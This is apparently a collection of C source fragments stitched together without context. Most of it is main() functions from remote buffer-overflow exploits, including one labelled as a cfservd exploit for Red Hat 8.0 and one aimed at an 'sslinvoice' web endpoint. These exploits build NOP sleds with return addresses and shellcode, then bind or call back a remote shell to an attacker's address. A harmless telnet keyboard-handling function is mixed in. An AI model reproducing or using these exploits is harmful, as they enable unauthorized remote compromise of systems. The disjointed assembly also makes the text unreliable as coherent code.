int main (void) { char buff[416]; int a; changeip(IP); changeport(cb, PORT, PORT_OFFSET); for (a = 0; a < 200; a++) *(buff+a) = 0x90; for (int b = 0; *(cb+b); a++, b++) *(buff+a) = *(cb+b); for (; a + 4 <= POE; a += 4) memcpy(buff+a, (addys+ADDY), 4); *(buff+a) = 0; fwrite(buff, strlen(buff), 1, stdout); return(0); }
int main(int argc, char *argv[]) { char opt; char *host, *ptr, *ip=""; struct sockaddr_in sockadd; int i, i_len, ok=0, mode=0, flag=0; int align=ALIGN, retsize=RET_SIZE, sc_offset=SC_OFFSET; int target=TARGET, scsize=SC_SIZE_1, port=PORT; int timeout=TIME_OUT, interval=INTERVAL; long retaddr; WSADATA wsd; SOCKET s1, s2; if (argc<2) { usage(argv[0]); } while ((opt=getopt(argc,argv,"a:i:I:r:s:h:t:T:p:Hl"))!=EOF) { switch(opt) { case 'a': align=atoi(optarg); break; case 'I': interval=atoi(optarg); break; case 'T': timeout=atoi(optarg); break; case 't': target=atoi(optarg); retaddr=targets[target-1].jmpesp; break; case 'i': ip=optarg; changeip(ip); break; case 'l': mode=1; scsize=SC_SIZE_2; break; case 'r': retsize=atoi(optarg); break; case 's': sc_offset=atoi(optarg); break; case 'h': ok=1; host=optarg; sockadd.sin_addr.s_addr=inet_addr(optarg); break; case 'p': port=atoi(optarg); break; case 'H': showtargets(); break; default: usage(argv[0]); break; } } if (!ok || (mode&&((strcmp(ip,"")==0)))) { usage(argv[0]); } memset(buff,NOP,BSIZE); ptr=buff+align; for(i=0;i<retsize;i+=4) { *((long *)ptr)=retaddr; ptr+=4; } if (WSAStartup(MAKEWORD(1,1),&wsd)!=0) { err_exit("-> WSAStartup error...."); } if ((s1=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { err_exit("-> socket() error..."); } sockadd.sin_family=AF_INET; sockadd.sin_port=htons((SHORT)port); ptr=buff+retsize+sc_offset; if (BSIZE<(retsize+sc_offset+scsize)) err_exit("-> Bad 'sc_offset'.."); banner(); if (mode) { printf("-> 'Listening' mode...( port: %d )\n",port); changeport(connback, port, PORT_OFFSET_2); for(i=0;i<scsize;i++) { *ptr++=connback[i]; } do_send(host,timeout); Sleep(1000); sockadd.sin_addr.s_addr=htonl(INADDR_ANY); i_len=sizeof(sockadd); if (bind(s1,(struct sockaddr *)&sockadd,i_len)<0) { err_exit("-> bind() error"); } if (listen(s1,0)<0) { err_exit("-> listen() error"); } printf("-> Waiting for connection...\n"); s2=accept(s1,(struct sockaddr *)&sockadd,&i_len); if (s2<0) { err_exit("-> accept() error"); } printf("-> Connection from: %s\n\n",inet_ntoa(sockadd.sin_addr)); resetalarm(); doshell(s2); } else { printf("-> 'Connecting' mode...\n",port); changeport(bindport, port, PORT_OFFSET_1); for(i=0;i<scsize;i++) { *ptr++=bindport[i]; } do_send(host,timeout); Sleep(1000); printf("-> Will try connecting to shell now....\n"); i=0; while(!flag) { Sleep(interval*1000); if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) { printf("-> Trial #%d....\n",i++); } else { flag=1; } } printf("-> Connected to shell at %s:%d\n\n",inet_ntoa(sockadd.sin_addr),port); resetalarm(); doshell(s1); } return 0; }
int main(int argc, char *argv[]) { char opt; char *buf, *ptr, *ip=""; struct sockaddr_in sockadd; int i, s1, s2, i_len, ok=0, mode=0; int time_out=TIME_OUT, scsize=SC_SIZE_1; int s_port=S_PORT, t_port=T_PORT, offset=RET_OFFSET; int retsize=RET_SIZE, align=ALIGN, buffsize=BUFF_SIZE; long ret_addr; if (argc<2) { usage(argv[0]); } while ((opt=getopt(argc,argv,"i:r:b:a:h:t:s:o:T:l"))!=EOF) { switch(opt) { case 'i': ip=optarg; changeip(ip); break; case 'l': mode=1; scsize=SC_SIZE_2; break; case 'T': time_out=atoi(optarg); break; case 'b': buffsize=atoi(optarg); break; case 'a': align=atoi(optarg); break; case 'h': ok=1; sockadd.sin_addr.s_addr = inet_addr(optarg); break; case 'r': retsize=atoi(optarg); break; case 't': t_port=atoi(optarg); break; case 's': s_port=atoi(optarg); break; case 'o': offset=atoi(optarg); break; default: usage(argv[0]); break; } } if (!ok || (mode&&((strcmp(ip,"")==0)) ) ) { usage(argv[0]); } if (!(buf=malloc(buffsize+1))) { err_exit("-> malloc() error"); } ret_addr=RET_ADDR-offset; fprintf(stdout,"\nCfservd Remote Exploit by snooq [ [email protected] ]\n"); fprintf(stdout,"Tested to work against cfservd 2.0.7 on Redhat 8.0\n\n"); fprintf(stdout,"-> Using return address of 0x%08x\n", ret_addr); ptr=buf; for(i=0;i<HDR_SIZE+align;i++) { *ptr++=HDR; } for(i=0;i<(buffsize-HDR_SIZE-align-scsize-retsize);i++) { *ptr++=NOP; } if (mode) { changeport(connback, s_port, PORT_OFFSET_2); for(i=0;i<scsize;i++) { *ptr++=connback[i]; } } else { changeport(bindport, s_port, PORT_OFFSET_1); for(i=0;i<scsize;i++) { *ptr++=bindport[i]; } } for(i=0;i<retsize;i+=4) { *((long *)ptr)=ret_addr; ptr+=4; } *ptr++=0; sockadd.sin_family = AF_INET; sockadd.sin_port = htons(t_port); if ((s1=socket(AF_INET,SOCK_STREAM,0))<0) { err_exit("-> socket error"); } if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) { err_exit("-> connect() error"); } if (mode) { fprintf(stdout,"-> 'Listening' mode...( port: %d )\n",s_port); if (fork()==0) { sleep(2); if (send(s1,buf,buffsize,0)<0) { err_exit("-> send() error"); } fprintf(stdout,"-> Exploit string sent....\n"); exit(0); } else { signal(SIGALRM,sigalrm); alarm(time_out); if ((s2=socket(AF_INET,SOCK_STREAM,0))<0) { err_exit("-> socket error"); } memset(&sockadd,0,sizeof(sockadd)); sockadd.sin_family = AF_INET; sockadd.sin_port = htons(s_port); sockadd.sin_addr.s_addr = htonl(INADDR_ANY); i_len=sizeof(sockadd); if (bind(s2,(struct sockaddr *)&sockadd,i_len)<0) { err_exit("-> bind() error"); } if (listen(s2,0)<0) { err_exit("-> listen() error"); } wait(); close(s1); fprintf(stdout,"-> Waiting for connection....\n"); s1=accept(s2,(struct sockaddr *)&sockadd,&i_len); if (s1<0) { err_exit("-> accept() error"); } alarm(0); fprintf(stdout,"-> Connection from: %s\n",inet_ntoa(sockadd.sin_addr)); sendcmd(s1); doshell(s1); } } else { if (send(s1,buf,buffsize,0)<0) { err_exit("-> send() error"); } close(s1); fprintf(stdout,"-> 'Connecting' mode...\n"); fprintf(stdout,"-> Exploit string sent. Waiting for a shell...\n"); sleep(2); sockadd.sin_family = AF_INET; sockadd.sin_port = htons(s_port); if ((s1=socket(AF_INET,SOCK_STREAM,0))<0) { err_exit("-> socket() error"); } if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) { fprintf(stdout,"-> Exploit failed. Target probably segfaulted...\n\n"); exit(0); } fprintf(stdout,"-> Connecting to shell at %s:%d\n",inet_ntoa(sockadd.sin_addr),s_port); sendcmd(s1); doshell(s1); } return(0); }
void process_key(unsigned char ascii,struct WindRec *tw) { if (tw->litNext) { //do no processing on next key tw->litNext = FALSE; kbwrite(tw, &ascii, 1); if (tw->echo) { if (ascii>31 && ascii <127) { /* add these chars to buffer */ parse(tw, &ascii, 1); } return; } } if (tw->lmodeBits & 2) { // TRAPSIG mode active unsigned char toSend[2] = {IAC,0}; short whichSignal = 0; if (ascii == tw->slc[SLC_IP]) { whichSignal = SLC_IP; toSend[1] = TEL_IP; } else if (ascii == tw->slc[SLC_SUSP]) { whichSignal = SLC_SUSP; toSend[1] = TEL_SUSP; } // RAB BetterTelnet 2.0b1 // The defaults in parse.h are to send ABORT on ^\ which is usually correct, but // feel free to hack this (in parse.h, not here) if BRK is better in your configuration. else if (ascii == tw->slc[SLC_ABORT]) { whichSignal = SLC_ABORT; toSend[1] = TEL_ABORT; } else if (ascii == tw->slc[SLC_BRK]) // RAB BetterTelnet 2.0b1 { whichSignal = SLC_BRK; toSend[1] = TEL_BREAK; } if (toSend[1]) //if we have a signal to catch { // if (tw->echo) // parse(tw, &ascii, 1); // echo if we should tw->kblen=0; //zero out the buffer netpush(tw->port); netwrite(tw->port,toSend,2); //send IAC whatever if (tw->slcLevel[whichSignal] & SLC_FLUSHIN) { unsigned char dm[2] = {IAC,TEL_DM}; netpush(tw->port); netUrgent();//send next as urgent data netwrite(tw->port,dm,2);//send IAC DM } if (tw->slcLevel[whichSignal] & SLC_FLUSHOUT) { unsigned char tm[3] = {IAC,TEL_DOTEL,N_TIMING}; tw->timing = 1; //tell ourselves to wait for WILL TIMING netpush(tw->port); netwrite(tw->port,tm,3);//send DO TIMING } return; } } if ((tw->lmodeBits & L_SOFT_TAB)&&(ascii == 0x09)) // SOFT_TAB mode active; expand tab into spaces { short numSpaces = VSIgetNextTabDistance(); unsigned char spacechar = ' '; while (numSpaces-- > 0) { kbwrite(tw, &spacechar, 1); } if (tw->echo) parse(tw, &ascii, 1); return; } if (tw->lmodeBits & L_EDIT) //handle editing functions { if (ascii == '\015') //CR { //since we are in edit, send the buffer and CR-LF kbflush(tw); netpush(tw->port); netwrite(tw->port,"\015\012",2); if (tw->echo) parse(tw,(unsigned char *) "\012\015",2); return; } if (ascii == tw->slc[SLC_EC]) //kill the character { if (tw->echo) parse(tw,(unsigned char *) "\010 \010",3); tw->kblen--; return; } else if (ascii == tw->slc[SLC_AO]) //kill the line { while (tw->kblen >0) { if (tw->echo) parse(tw,(unsigned char *) "\010 \010",3); tw->kblen--; } return; } else if (ascii == tw->slc[SLC_EL]) //kill the line { while (tw->kblen >0) { if (tw->echo) parse(tw,(unsigned char *) "\010 \010",3); tw->kblen--; } return; } else if ((ascii == tw->slc[SLC_EOF]) && (tw->lmodeBits & 2)) { //push the buffer, send IAC EOF (RAB BetterTelnet 2.0b1 - only under TRAPSIG) char eofString[2] = { IAC, TEL_EOF }; kbflush(tw); // RAB BetterTelnet 2.0b1 - BAD! BAD! BAD! // Fix for *BSD (and probably others): // Putting ^D into Telnet's key buffer after sending an EOF could make it pop up later, so // hitting some keys (arrows seemed to do the trick) that flushed Telnet's key buffer // after a cat command which terminated with ^D caused a logout. Yuck. // tw->kbbuf[0]=ascii; // tw->kblen=1; netpush(tw->port); netwrite(tw->port,eofString, 2); return; } // RAB BetterTelnet 2.0b1 // We don't need to do this down here if we're already handling TRAPSIG mode // separately. The SUSP (usually ^Z) char is part of TRAPSIG, not EDIT. // else if (ascii == tw->slc[SLC_SUSP]) // { // char eofString[2] = { IAC, TEL_SUSP }; // if (tw->kblen > 0) // netwrite(tw->port, tw->kbbuf, tw->kblen); // tw->kblen = 0; // netpush(tw->port); // netwrite(tw->port,eofString, 2); // return; // } else if (ascii == tw->slc[SLC_EW]) { while ((tw->kbbuf[tw->kblen-1] != 0x20)&&(tw->kblen >= 0)) //while its not a space { if (tw->echo) parse(tw,(unsigned char *)"\010 \010",3); tw->kblen--; } } else if (ascii == tw->slc[SLC_RP]) { VSredrawLine(tw->vs); return; } else if (ascii == tw->slc[SLC_LNEXT]) { tw->litNext = TRUE; return; } else if (ascii == tw->slc[SLC_XON]) { if (tw->allow_flow) { //remote flow control can turn this off tw->enabled = 1; // oops small bug (RAB BetterTelnet 2.0b1) changeport(scrn, scrn); } return; } else if (ascii == tw->slc[SLC_XOFF]) { if (tw->allow_flow) { //remote flow control can turn this off tw->enabled = 0; changeport(scrn, scrn); } return; } else if ((ascii == tw->slc[SLC_FORW1])||(ascii == tw->slc[SLC_FORW1])) { kbflush(tw); netwrite(tw->port,&ascii,1); return; } //ok, at this point, we are past all local editing functions. Now, add the character to the buffer. else { kbwrite(tw, &ascii, 1); } } else if (ascii == '\015') //CR; map this to CR-LF { unsigned char toSend[2] = {0x0D,0x00}; netpush(tw->port); netwrite(tw->port,toSend,2); if (tw->echo) parse(tw,(unsigned char *) "\012\015",2); return; } else //not editing; send it { netpush(tw->port); netwrite( tw->port, &ascii, 1); // if full send buffer } if (tw->echo) /* Handle local ECHOs */ { if (ascii>31 && ascii <127) /* add these chars to buffer */ parse(tw, &ascii, 1); else /* not printable char */ { if (!(tw->lmodeBits & L_LIT_ECHO)) //don't echo if this is set { ascii='@'+ascii; parse(tw,(unsigned char *) "^",1); parse(tw, &ascii, 1); } } } }
int main (int argc, char **argv) { int sock; unsigned offset = OFFSET, ipaddr, i = 0; unsigned short port = PORT, cbport = CB_PORT; struct sockaddr_in server; char *host, *location, *cbip, buff[5120], opt; host = location = cbip = 0; while ((opt = getopt(argc, argv, "i:p:o:l:1:2:h")) != -1) { switch(opt) { case 'i': host = optarg; break; case 'p': sscanf(optarg, "%hu", &port); break; case 'o': sscanf(optarg, "%x", &offset); break; case 'l': location = optarg; break; case '1': cbip = optarg; break; case '2': sscanf(optarg, "%hu", &cbport); break; } } if (!(host && location && cbip)) { puts("-!> a required argument was missing\n"); help(); exit(1); } changeip(cbip); changeport(cb, cbport, PORT_OFFSET); if ((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1) { printf("socket() error: %s\n", strerror(errno)); exit(1); } server.sin_port = htons(port); if ((ipaddr = inet_addr(host)) == -1) { struct hostent *myhost; if ((myhost = gethostbyname(host)) == 0) { printf("-!> failed to resolve host '%s'\n", host); exit(1); } memcpy((char*) &server.sin_addr, myhost->h_addr, myhost->h_length); } else server.sin_addr.s_addr = ipaddr; server.sin_family = AF_INET; memset(&(server.sin_zero), 0, 8); if (connect(sock, (struct sockaddr *) &server, sizeof(server)) != 0) { printf("-!> connect() to '%s:%hu' failed: %s\n", host, port, strerror(errno)); exit(1); } sprintf(buff, "GET %s?sslinvoice HTTP/1.1\nHost: %s\nContent-Length: %u\n\n", location, host, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit")); send(sock, buff, strlen(buff), 0); for (0; i < 4000; i++) *(buff+i) = 0x90; for (unsigned a = 0; a < sizeof(cb) - 1; i++, a++) *(buff+i) = *(cb+a); for (unsigned a = 0; a < 128; i += 4, a++) memcpy(buff+i, &offset, 4); strcpy(buff+4000+sizeof(cb)+512 - 1, "Submit\n"); send(sock, buff, 4000 + sizeof(cb) + 512 - 1 + strlen("Submit"), 0); }